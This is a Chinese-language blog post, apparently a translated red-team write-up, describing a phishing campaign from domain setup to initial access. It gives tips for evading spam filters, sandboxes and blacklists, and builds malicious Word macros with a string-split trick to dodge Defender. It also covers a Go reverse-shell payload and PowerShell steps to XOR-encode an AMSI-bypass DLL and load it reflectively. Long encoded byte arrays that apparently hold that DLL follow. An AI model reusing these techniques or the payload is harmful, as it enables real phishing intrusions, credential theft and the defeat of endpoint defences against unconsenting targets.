Red Team Techniques-通过钓鱼攻击获得访问权限

栏目: 编程工具 · 发布时间: 5年前

内容简介:关于红队如何制作网络钓鱼攻击的帖子很多,但是大多数不是很完整。我下面会讲我们最近的一次攻击案例,从0到获得权限,包括域名的创建,制作钓鱼攻击的手段,绕过垃圾邮件过滤器,和电子邮件网关的注意事项,生成bypass 的payload以及绕过AMSI,文章的末尾我列了一份参考文章的清单。dig evilwing.me MX

关于红队如何制作网络钓鱼攻击的帖子很多,但是大多数不是很完整。

我下面会讲我们最近的一次攻击案例,从0到获得权限,包括域名的创建,制作钓鱼攻击的手段,绕过垃圾邮件过滤器,和电子邮件网关的注意事项,生成bypass 的payload以及绕过AMSI,文章的末尾我列了一份参考文章的清单。

重要的注意事项

  • 邮件的来源
    • 使用脚本从本地发送邮件
    • headers中的ip可信度
  • 最近购买的VPS有没有发件人历史记录
  • 链接的可信度和域名的年龄
  • 使用信任度高的发件人,如Mailchimp或Sendgrid
    • 使用这些服务商来验证自己的域名,然后电子邮件就是” 发件人:自己的域名 “,而不是 通过Mailchimp for XXX
  • 匹配目标电子邮件的返回路径
  • 配置SPF(发件人策略框架),DKIM(域名密钥识别邮件),DMARC(DMARC是一种基于现有的SPF和DKIM协议的可扩展电子邮件认证协议,在邮件收发双方建立了邮件反馈机制,便于邮件发送方和邮件接收方共同对域名的管理进行完善和监督。)
  • 时间和发送频率
    • 如果从一个可信度极低的ip一次发送100封电子邮件,基本会被标记为垃圾邮件
  • 在发送的域名和链接中有SSL证书
  • 死链接( https://www.computerhope.com/jargon/b/broken_link.htm)
  • HTML内容的数量

    远离黑名单

    你参与的时间长短决定了你对这件事情的关注度。

  • 对自动化扫描引擎的保护。如果你克隆的站点信任度很高,这一点很重要

    • Scrapers和SEG(安全电子邮件网关)可以发现Office 365和Gmail等网络钓鱼页面。
    • 为自动化平台提供正常的内容,防止被检测到。
    • 您可以使用公开的 GreyNoise API 中的 WEB_CRAWLER 标签找到网页爬虫 工具 列表
    • -s -XPOST -d 'tag
      ```
       - 你也可以使用一些技术来识别headless Chrome,Selenium等环境
      - 在可信度高的域名上放我们的payload
       -  SEGs 识别恶意payload的能力越来越强,如果被发现,就有可能被列入黑名单
      - 一旦被发现,再去攻击,成功率很小了,而且这次计划很有可能就得到此为止。
      - 查看这个帖子,https://posts.specterops.io/being-a-good-domain-shepherd-part-2-5e8597c3fe63,看你的域名是否如文中所说。
      - 301/302重定向到信任度高的域名
       - 您的域名可能被归类为恶意域名,因为您实际上与重定向的域名并没有什么关联。
      
       ## 行动
       通常来说,主要以下面三种方式处理网络钓鱼活动。
       1. 针对某个人进行针对性的活动
       2. 针对在侦查阶段收集用户信息,然后群发攻击。推荐几个资源,https://github.com/laramies/theHarvester,https://github.com/DataSploit/datasploit,https://github.com/jivoi/awesome-osint,https://medium.com/@micallst/osint-resources-for-2019-b15d55187c3f
       3. 在目标的站点提交表单,通常是建立一个假公司
       
       
       每个攻击活动都要使用不同的域名,防止相互干扰,影响信任度,攻击活动应该从微小到庞大,如果公司意识到他们是目标,你以后的活动就会收到越来越严格的审查,我们经常在验证域名和设置电子邮件身份的验证后,会使用Mailchimp传递。我们成功的使用自己的脚本,用G Suite 账户和SMTP验证。
       
       由于时间限制(20 hours),我们选择了选项2和3,对于这两个攻击活动,我们使用了恶意的word文档,宏攻击。
       
       ## 侦查
       我们通过MX查询,发现目标公司是用G suite。
      

dig evilwing.me MX

![](https://raw.githubusercontent.com/evilwing/wing-images/master/img/20190221203000.png)

这是我自己域名的示例

Google在过滤恶意附件的方面做得很好,因此在这一系列的攻击活动中,将系列一的恶意文件放到高信任度的域名上,二则是将其放到自己的域名上。

## 攻击准备,生成word文档和payload

利用[unicorn](https://github.com/trustedsec/unicorn)生成一个恶意的powershell 宏来下载执行payload。
稍微改一下绕过Defender:

“po” & “w” & “er” & “s” & “he” & “l” & “l” & “.e” & “x” & “e” & “ “

我们使用[hershell](https://github.com/lesnuages/hershell)作为payload,这是用 Go 写的轻量级Stage,X86架构当时是无法察觉的,payload生成以后,下面就是混淆和加密,如果使用dsplit之类的东西知道目标环境,也可以手动绕过AV签名。以下是一些资源:

https://resources.infosecinstitute.com/antivirus-evasion-tools/

https://github.com/PowerShellMafia/PowerSploit/blob/master/AntivirusBypass/Find-AVSignature.ps1

http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html

msf5最近也增加了两个免杀模块。

## AMSI绕过
要执行我们的powershell代码,就得绕过微软亲儿子。WD。WD可以防恶意软件的接口,powershell在执行前会向扫描引擎提交内容,然后分析。幸好[cyberark](https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/)之前研究过关于这东西的免杀,被微软标记为使用XOR绕过免杀。
  1. Re-compile the AMSI Bypass DLL
  2. Convert the binary to base64
    $base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes(“$pwd\bypass.dll”))
  3. XOR encrypt
    foreach($byte in [Text.Encoding]::UTF8.GetBytes($base64string)) { $encrypted += $byte -bxor 1 }
  4. Print encrypted buf as a byte array
    foreach($byte in $encrypted){ Write-Host -nonewline “$byte,” }

On Target

  1. Split encrypted buf due to powershell line limit lengths
  2. Concat the buf
    $xorencrypted = $a + $b + $c + $d + $e + $f + $g
  3. Decrypt the buf
    foreach($byte in $xorencrypted){$decrypted += $byte -bxor 1 }
  4. Get buf as base64
    $base64string = [Text.Encoding]::UTF8.GetString($decrypted)
  5. Load the DLL using reflection
    function Bypass-AMCEE { if(-not ([System.Management.Automation.PSTypeName]”Bypass.AMCEE”).Type) { [Reflection.Assembly]::Load([Convert]::FromBase64String($base64string)) | Out-Null } [Bypass.AMCEE]::Subvert(); }
  6. Call the bypass method
    Bypass-AMCEE
    这允许我们在内存中执行payload,比如Mimikatz
    AMSI 的bypass:https://gist.github.com/jkamdjou/fcba44227cda85eb8829ee43646c6c77
    

$a = @(85,87,112,80,64,64,76,64,64,64,64,68,64,64,64,64,46,46,57,64,64,77,102,64,64,64,64,64,64,64,64,64,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,102,64,64,64,64,64,53,103,116,102,53,64,117,64,111,79,72,99,102,67,85,76,49,105,87,70,105,113,98,120,67,118,98,108,56,111,98,108,71,117,72,70,79,105,99,108,52,119,101,66,67,104,91,82,67,120,101,86,53,102,96,86,53,102,83,68,56,85,72,70,48,119,91,70,84,116,69,80,49,74,75,64,64,64,64,64,64,64,64,64,67,80,83,80,64,64,85,64,68,69,64,77,117,66,77,109,118,64,64,64,64,64,64,64,64,64,64,78,64,64,72,104,64,77,64,85,64,64,64,64,53,64,64,64,64,70,64,64,64,64,64,64,64,64,66,104,118,64,64,64,64,102,64,64,64,64,80,64,64,64,64,64,64,64,68,64,64,102,64,64,64,64,64,102,64,64,67,64,64,64,64,64,64,64,64,64,64,70,64,64,64,64,64,64,64,64,64,64,66,64,64,64,64,64,64,102,64,64,64,64,64,64,64,64,76,64,88,72,84,64,64,67,64,64,64,67,64,64,64,64,64,64,68,64,64,64,68,64,64,64,64,64,64,64,64,67,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,77,102,115,64,64,67,81,64,64,64,64,64,68,64,64,64,70,102,69,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,70,64,64,64,64,118,64,64,64,66,64,74,102,64,64,73,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,72,64,64,64,66,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,66,66,64,64,64,68,102,64,64,64,64,64,64,64,64,64,64,64,64,64,64,66,52,49,91,89,105,49,64,64,64,64,70,64,118,64,64,64,64,102,64,64,64,64,69,102,64,64,64,64,72,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,66,64,64,64,70,64,116,98,111,79,120,88,118,64,64,64,70,102,69,64,64,64,64,80,64,64,64,64,64,80,64,64,64,64,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,67,64,64,64,67,64,77,111,75,109,99,70,56,107,64,64,64,76,64,64,64,64,64,70,64,64,64,64,64,66,64,64,64,64,71,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,80,64,64,64,80,102,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,69,114,74,118,64,64,64,64,64,64,64,68,102,64,64,64,64,66,64,64,84,64,74,66,68,64,64,71,102,75,64,64,64,67,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,67,76,118,67,64,69,69,64,64,64,64,64,80,64,64,68,80,67,120,64,80,64,64,98,66,102,80,64,64,64,74,64,73,72,83,64,64,67,118,74,64,72,64,64,64,88,74,67,111,53,83,64,64,64,74,74,67,72,64,64,64,110,85,67,105,68,70,77,64,106,64,71,121,76,73,78,72,57,64,64,64,64,70,98,104,76,64,64,73,64,110,64,80,64,64,67,102,114,73,103,105,68,64,64,64,110,110,68,102,64,64,66,105,76,72,68,80,102,114,67,102,64,89,68,118,98,115,99,67,117,112,74,67,76,64,64,64,110,76,71,102,49,73,66,67,56,64,68,102,76,110,64,118,64,64,67,105,99,42,64,83,76,75,68,80,106,114,67,102,64,89,68,118,98,115,82,67,108,79,71,102,64,64,64,82,89,80,64,80,64,64,67,66,102,84,64,64,64,74,68,118,80,91,74,67,84,64,64,64,110,85,67,83,68,68,71,105,68,71,70,82,102,86,64,64,64,74,64,64,98,103,70,120,102,89,64,64,64,74,68,80,84,91,74,64,80,64,64,64,88,64,98,106,68,64,64,73,64,110,68,64,64,64,66,102,64,86,68,118,98,115,64,67,68,73,74,104,72,66,74,67,102,64,64,64,110,64,74,106,75,85,82,106,72,67,64,64,68,64,64,64,64,64,64,64,118,64,64,64,67,51,79,66,53,118,77,107,76,118,76,123,68,52,64,64,64,64,64,64,84,64,99,64,64,64,64,67,118,69,64,64,64,107,103,102,64,64,104,64,76,64,64,81,102,69,64,64,64,107,84,50,83,120,96,86,52,111,98,118,64,64,64,64,66,64,67,118,64,64,88,64,64,64,64,66,79,87,84,118,69,102,67,118,64,64,68,64,64,64,64,66,79,73,87,84,109,68,64,64,64,64,57,64,98,64,64,70,102,67,64,64,64,107,80,108,121,119,88,102,64,64,64,64,64,64,64,64,64,66,64,64,64,67,87,52,84,66,79,64,106,66,64,64,64,64,42,102,68,123,64,67,88,64,64,64,68,64,64,64,64,96,64,64,64,64,67,64,64,64,64,64,68,64,64,64,64,70,64,64,64,64,66,102,64,64,64,67,102,64,64,64,64,81,64,64,64,64,64,80,64,64,64,64,68,64,64,64,64,66,64)

$b = @(64,64,64,67,64,64,64,64,64,68,64,64,64,64,67,64,64,64,64,64,80,64,64,64,64,68,64,64,64,64,64,64,75,118,66,64,80,64,64,64,64,64,64,67,102,69,68,64,83,68,69,67,102,64,121,64,105,68,69,67,102,69,53,64,79,57,66,69,118,64,121,64,118,64,64,67,102,64,102,64,96,53,66,67,102,66,111,64,96,53,66,67,102,66,72,64,96,53,66,67,102,64,88,64,112,53,66,67,102,69,106,64,96,53,66,67,102,69,56,64,96,53,66,67,102,64,50,64,96,53,66,67,102,64,76,64,103,72,66,67,102,69,112,64,81,72,66,67,102,67,115,64,96,53,66,67,102,67,82,64,86,64,66,67,102,67,119,64,55,98,66,67,102,69,81,64,67,68,69,67,102,69,71,64,74,98,66,67,102,66,101,64,74,98,66,67,102,69,88,64,112,98,66,67,102,69,89,64,112,98,66,67,102,67,81,64,112,98,66,67,102,67,64,64,121,68,69,67,102,69,68,64,55,98,66,67,102,66,74,64,74,98,66,67,102,66,73,64,119,72,66,64,64,64,64,64,66,88,64,64,64,64,64,64,64,68,64,64,80,64,67,64,67,64,64,101,118,67,81,64,49,68,64,64,80,64,67,64,64,64,67,64,64,64,119,64,64,64,64,80,80,64,67,64,64,98,64,68,118,68,64,64,64,110,64,64,64,67,75,64,64,72,64,67,118,64,123,64,84,53,64,88,64,64,64,64,64,64,64,102,64,66,86,72,71,88,69,91,64,64,67,64,64,64,64,64,64,66,64,64,75,88,102,123,118,79,112,64,64,76,64,64,64,64,64,64,72,64,64,109,104,66,71,64,51,57,64,67,64,64,64,64,64,64,64,102,64,66,83,72,79,53,69,100,64,64,72,64,71,64,102,64,64,64,64,64,75,88,64,115,80,79,46,64,64,114,64,73,120,68,64,64,64,64,64,105,105,107,83,64,102,88,64,66,118,64,64,64,64,68,64,113,80,64,64,64,64,72,64,115,80,64,64,64,64,68,64,117,102,64,64,64,64,68,64,91,80,76,64,64,64,72,64,87,64,72,64,64,64,76,64,109,64,76,66,64,64,80,64,101,102,76,64,64,64,68,64,117,80,76,64,64,64,72,64,105,102,64,64,64,64,76,64,86,118,72,75,64,79,68,66,64,80,64,83,64,79,68,66,67,102,64,91,64,79,68,66,66,102,64,113,64,79,68,66,68,64,64,121,64,79,68,66,68,64,64,52,64,79,68,66,68,64,67,67,64,79,68,66,68,64,67,75,64,79,68,66,68,64,67,83,64,79,68,66,68,64,67,91,64,79,68,66,68,64,67,105,64,79,68,66,71,80,67,113,64,79,68,66,68,64,67,121,64,79,68,66,68,64,67,52,64,79,68,66,68,64,66,75,64,79,68,66,67,102,66,91,64,77,114,64,74,64,66,105,64,76,118,66,77,80,66,105,64,78,106,69,76,64,66,113,64,74,68,69,79,102,66,52,64,77,110,69,78,118,69,83,64,73,110,66,80,118,69,83,64,76,110,69,82,64,66,105,64,76,64,66,84,80,66,67,64,79,68,66,67,102,64,116,64,64,114,64,102,118,64,116,64,67,76,64,107,64,64,116,64,67,114,64,112,118,64,116,64,66,76,64,117,64,64,116,64,66,114,64,118,64,64,116,64,69,76,64,118,64,64,116,64,69,114,64,118,64,64,116,64,68,76,64,117,64,64,116,64,68,114,64,121,102,64,116,64,71,76,64,118,64,64,116,64,71,114,64,118,64,64,116,64,70,76,64,50,102,64,116,64,70,114,64,66,64,68,116,64,73,76,64,71,80,71,107,64,73,114,64,88,118,68,67,64,64,76,64,64,64,64,68,64,67,110,64,64,80,66,81,64,102,64,67,64,118,67,86,64,118,68,64,64,64,68,71,64,76,57,69,64,80,64,64,64,80,98,64,105,80,76,67,64,64,64,67,66,80,69,99,64,118,72,64,68,66,118,64,64,64,68,64,67,72,64,64,64,64,68,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,85,118,76,64,64,64,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,71,98,64,103,80,64,64,64,64,64,64,67,64,64,69,64,64,64,64,64,64,64,64,96,51,87,120,99,108,87,114,76,123,72,64,89,48,56,85,101,70,71,49,96,86,79,67,98,111,75,105,100,84,109,116,96,89,83,84,100,89,67,109,84,51,109,55,91,85,49,123,64,69,121,79,99,51,83,48,99,70,84,42,64,69,121,80,98,108,109,51,88,89,83,109,82,86,48,118,99,70,87,117,91,86,52,49,88,89,83,113,99,51,52,68,91,89,83,105,96,86,121,123,81,102,64,48)

$c = @(76,84,79,67,83,106,72,49,78,69,68,123,78,84,72,118,76,106,84,118,79,107,71,68,79,69,106,121,78,84,76,48,76,85,98,51,79,107,72,121,80,106,88,53,79,49,83,67,80,49,87,68,64,68,71,79,80,49,87,71,64,70,48,123,88,51,56,120,99,70,109,104,64,73,79,120,88,118,67,82,101,86,52,49,96,86,48,109,83,108,109,109,99,70,83,72,88,86,52,106,99,70,84,64,80,51,56,116,98,51,56,114,91,80,67,110,85,86,56,106,101,86,121,109,64,73,67,120,99,51,79,78,88,86,48,109,64,70,52,105,99,86,84,64,87,50,75,113,101,70,87,76,96,86,52,109,64,71,91,105,99,73,87,109,87,73,109,118,91,80,67,69,99,51,48,118,96,86,121,109,98,106,101,109,99,108,87,120,88,89,83,109,91,68,71,49,101,73,75,113,88,111,87,49,91,80,67,73,101,86,109,106,80,89,83,49,98,108,109,104,101,89,83,109,64,68,83,109,88,111,87,111,91,51,71,104,99,70,87,67,101,73,83,120,96,86,75,48,101,70,84,64,80,51,56,117,87,108,109,123,96,86,75,114,91,84,71,49,101,73,75,113,88,111,87,49,91,80,67,67,98,50,79,109,99,86,75,114,100,87,83,113,101,70,121,109,80,89,83,49,98,108,109,104,101,89,83,109,64,68,71,123,98,51,87,117,88,108,121,52,87,73,75,105,91,70,87,117,88,89,75,115,80,89,83,49,98,108,109,104,101,89,83,109,64,71,83,105,98,108,101,109,101,68,91,120,88,86,48,109,101,51,56,120,96,49,71,49,101,73,75,113,88,111,87,49,91,80,67,67,98,50,79,109,99,86,75,114,100,84,91,113,99,70,87,86,91,89,75,123,96,86,56,116,80,89,83,49,98,108,109,104,101,89,83,109,64,68,71,123,98,51,87,117,88,108,121,52,80,51,56,116,91,108,109,111,101,89,75,105,101,70,109,119,99,106,71,49,101,73,75,113,88,111,87,49,91,80,67,67,98,50,79,109,99,86,75,114,100,84,83,109,98,51,79,120,96,89,67,49,96,86,56,116,80,89,83,49,98,108,109,104,101,89,83,109,64,68,79,119,99,89,67,113,99,70,71,49,96,86,56,116,84,108,87,114,88,89,105,105,101,70,109,119,99,111,79,67,101,73,83,120,96,86,75,48,101,70,84,64,80,89,79,123,91,86,48,104,99,73,109,80,98,108,56,106,101,86,79,49,80,89,83,49,98,108,109,104,101,89,83,109,64,68,71,123,98,51,87,117,88,108,121,52,80,51,56,118,100,89,75,113,91,51,105,49,80,89,83,49,98,108,109,104,101,89,83,109,64,68,71,123,98,51,87,117,88,108,121,52,80,51,56,117,98,70,71,116,100,84,71,49,101,73,75,113,88,111,87,49,91,80,67,82,101,86,52,49,96,86,48,109,80,51,56,117,98,70,71,49,96,86,75,113,99,70,109,49,100,84,71,49,101,73,75,113,88,111,87,49,91,80,67,66,100,89,83,109,64,70,83,50,84,51,109,55,91,80,67,123,96,89,113,109,64,71,79,52,98,50,83,109,99,82,52,82,101,86,52,49,96,86,48,109,77,109,91,109,98,111,79,113,99,51,52,113,99,108,98,64,80,86,121,114,99,51,79,72,83,51,121,119,88,108,71,114,64,68,48,105,98,111,79,110,88,86,118,64,82,51,87,120,99,108,87,114,76,123,72,116,91,70,121,114,64,68,75,52,98,70,71,123,98,120,52,106,99,70,118,64,84,50,109,123,101,70,87,117,64,71,79,52,98,50,83,109,99,82,52,82,91,86,91,114,91,86,79,49,96,86,56,116,64,70,56,118,89,49,71,106,91,70,109,49,96,86,56,116,64,71,113,109,98,108,57,64,77,108,79,49,99,50,72,64,87,84,109,116,101,71,67,49,98,102,67,85,100,89,79,49,91,86,49,116,83,70,109,105,91,51,52,119,98,50,83,113,88,50,76,64,84,50)

$d = @(109,123,101,70,87,117,77,109,75,48,99,111,83,113,99,86,84,116,82,86,52,49,91,89,75,119,98,71,79,109,98,111,91,113,88,51,87,123,64,71,79,52,98,50,83,109,99,82,52,82,101,86,52,49,96,86,48,109,77,106,79,119,99,89,67,113,99,70,87,120,84,51,87,120,101,108,109,107,91,89,76,64,83,70,87,104,101,86,101,111,96,86,52,111,85,86,56,106,91,89,76,64,84,111,87,116,101,70,109,117,91,84,105,109,99,73,67,109,98,111,76,64,80,111,109,118,88,89,79,123,64,68,101,109,101,71,67,120,99,51,79,67,91,70,83,120,91,89,79,123,64,70,121,118,80,86,83,106,98,108,87,123,98,118,67,81,88,108,113,109,88,50,80,64,99,73,67,108,99,68,56,114,91,71,67,120,99,50,83,109,88,50,80,64,87,108,109,120,101,73,87,105,99,71,67,120,99,50,83,109,88,50,80,64,91,108,121,78,91,89,101,80,98,108,56,49,91,86,79,49,64,70,56,118,89,49,87,53,98,70,121,113,88,51,109,49,64,71,79,48,88,111,91,109,98,111,80,64,91,70,87,123,101,64,67,75,99,108,109,49,96,86,71,114,96,89,113,109,80,89,75,120,88,89,106,64,80,51,56,118,100,80,67,76,99,51,71,106,85,70,109,104,98,108,71,120,100,80,67,82,101,70,121,79,99,50,91,109,85,86,87,117,99,50,75,52,64,70,56,118,89,49,87,121,101,86,71,114,96,89,83,52,64,64,64,64,64,64,64,81,84,102,67,48,64,70,53,64,99,102,67,113,64,70,53,64,91,118,64,64,68,86,68,64,99,80,67,123,64,70,106,64,77,102,67,106,64,70,118,64,99,64,64,64,73,84,68,64,99,80,67,123,64,70,106,64,84,118,67,107,64,70,68,64,99,102,67,66,64,73,84,64,91,102,67,108,64,70,84,64,98,102,64,64,73,89,64,64,88,80,67,49,64,70,76,64,96,64,64,102,64,70,68,64,98,64,67,118,64,70,118,64,96,80,67,109,64,70,80,64,77,102,64,64,64,74,119,84,84,119,53,96,78,51,109,81,114,49,55,107,110,114,66,114,78,74,118,64,67,66,64,67,64,80,102,69,72,64,64,67,67,82,64,67,64,83,68,83,67,66,64,67,64,80,53,68,72,64,68,67,64,102,49,73,66,105,102,88,70,80,106,101,67,83,102,66,66,64,72,66,67,64,64,67,64,80,53,66,67,105,102,71,64,64,72,66,70,67,102,68,64,64,68,91,66,118,98,64,64,102,68,82,88,83,71,109,67,64,64,67,70,64,102,72,64,64,80,67,73,80,84,72,70,64,102,71,64,64,72,88,70,64,102,72,117,50,113,98,87,105,106,49,53,72,106,69,67,105,68,80,67,80,64,66,70,67,102,78,67,64,64,67,70,64,53,72,64,64,80,66,70,67,106,75,68,64,106,70,64,64,76,67,70,67,102,72,64,118,64,64,66,64,102,67,64,64,102,64,64,64,64,64,64,67,53,67,64,64,68,64,87,64,72,86,87,50,75,105,98,68,52,119,99,106,87,53,88,51,87,118,101,70,109,119,99,109,83,110,98,108,56,50,98,118,68,72,64,80,64,73,64,80,64,64,64,64,64,77,64,80,64,70,80,111,109,118,88,89,79,123,64,64,64,71,64,80,64,64,64,64,64,89,64,80,64,82,80,51,56,118,100,89,75,113,91,51,105,49,72,76,74,113,72,66,64,120,76,69,68,52,64,64,64,113,64,80,64,106,88,123,68,120,88,123,88,53,76,108,88,117,79,85,67,106,76,82,49,49,76,107,88,48,77,85,106,50,88,86,84,117,79,69,84,123,79,123,76,48,91,86,75,108,88,86,80,123,64,64,64,76,64,80,64,73,76,82,53,118,77,107,64,116,76,64,64,64,85,80,68,64,73,66,52,78,83,87,83,70,98,108,71,117,91,89,101,119,98,108,114,114,87,108,87,120,98,51,109,119,99,107,48,51,79,66,53,48,77,107,72,67,64,71,80,78,71,68,91,120,88,86,48,109,101,51,56,120,96,49,83,113,98,50,67,114,88,89,109,78,88,86,48,109,71,66,52,78,83,87,80,102,83,111,75,105,99,86,87,50,99,50,75,115,72,69,80,116,79,82,53,120,67,64,68,64,64,64,64,64,64,64,64,64,116,49,72,116,89,64,64,64,64,64,64,66,64,64,64,64,73,64,68,64,64,75,118,112,64,64,66,98,69,64,64,64,84,109,79,68,84,123,51,67,98,101,66,73,66,74,83,76,111,54,117,91,68,115,112,76,103,68,114,67,64,64,64,64,80,123,113,98,87,89,79,109,98,111,79)

$e = @(98,96,108,56,123,96,71,121,68,99,51,79,48,99,86,87,116,101,73,79,98,87,108,109,123,101,86,71,114,72,71,79,49,101,86,83,113,99,120,64,120,76,69,68,50,89,71,67,120,99,51,113,109,88,50,83,123,89,68,75,52,98,70,71,123,98,48,121,66,100,89,67,105,98,50,79,98,99,51,75,112,89,68,83,109,88,111,87,111,89,68,75,52,98,70,71,123,98,120,52,118,91,70,72,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,69,102,74,118,64,64,64,64,64,64,64,64,64,64,64,64,69,55,74,118,64,64,64,66,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,54,66,114,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,67,103,80,51,56,120,83,70,121,114,85,86,71,113,99,102,67,117,98,51,79,119,98,108,87,109,77,108,83,114,99,64,64,64,64,64,64,64,46,120,84,64,72,64,64,80,76,103,42,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64)

$f = @(64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,80,64,80,64,64,64,64,70,64,64,64,102,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,80,64,67,64,64,64,64,76,64,64,64,102,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,80,64,64,64,64,64,64,82,64,64,64,64,71,105,64,64,64,64,76,64,118,64,64,64,64,64,64,64,64,64,64,64,64,64,76,64,123,80,64,64,64,67,86,64,71,76,64,89,118,67,86,64,68,84,64,84,102,67,85,64,68,106,64,85,118,67,78,64,71,57,64,82,80,67,78,64,68,88,64,85,118,64,64,64,64,64,64,119,80,85,119,46,102,64,64,64,80,64,64,64,64,68,64,64,64,64,64,64,64,64,64,64,80,64,64,64,64,64,64,81,118,64,64,64,64,64,64,64,64,64,68,64,64,64,64,64,102,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,68,80,64,64,64,64,67,64,71,88,64,88,80,67,120,64,68,88,64,96,80,67,114,64,70,84,64,82,80,67,116,64,70,88,64,99,118,64,64,64,64,64,64,75,64,64,68,64,64,64,64,87,64,67,120,64,70,68,64,99,102,67,123,64,70,118,64,88,80,67,49,64,70,106,64,99,118,67,116,64,64,64,64,64,64,64,64,64,77,64,68,99,64,72,64,64,64,68,64,84,118,67,49,64,73,72,64,96,80,67,116,64,70,98,64,83,102,67,113,64,70,118,64,91,80,67,75,64,70,53,64,91,102,67,119,64,64,64,64,82,64,72,64,64,64,68,64,76,64,64,118,64,69,64,64,76,64,64,118,64,69,80,64,88,102,64,118,64,64,64,64,70,102,64,67,64,64,68,64,80,118,67,119,64,70,49,64,99,80,67,109,64,70,53,64,101,64,67,123,64,64,64,64,64,64,64,64,64,66,72,64,64,80,64,67,64,68,76,64,99,118,67,117,64,73,64,64,88,80,67,116,64,73,106,64,85,102,67,105,64,70,49,64,91,80,64,64,64,64,64,64,64,64,64,64,64,69,88,64,67,118,64,67,64,68,88,64,96,80,67,114,64,70,84,64,83,64,67,109,64,73,76,64,88,118,67,120,64,70,106,64,98,64,67,49,64,70,106,64,99,118,67,116,64,64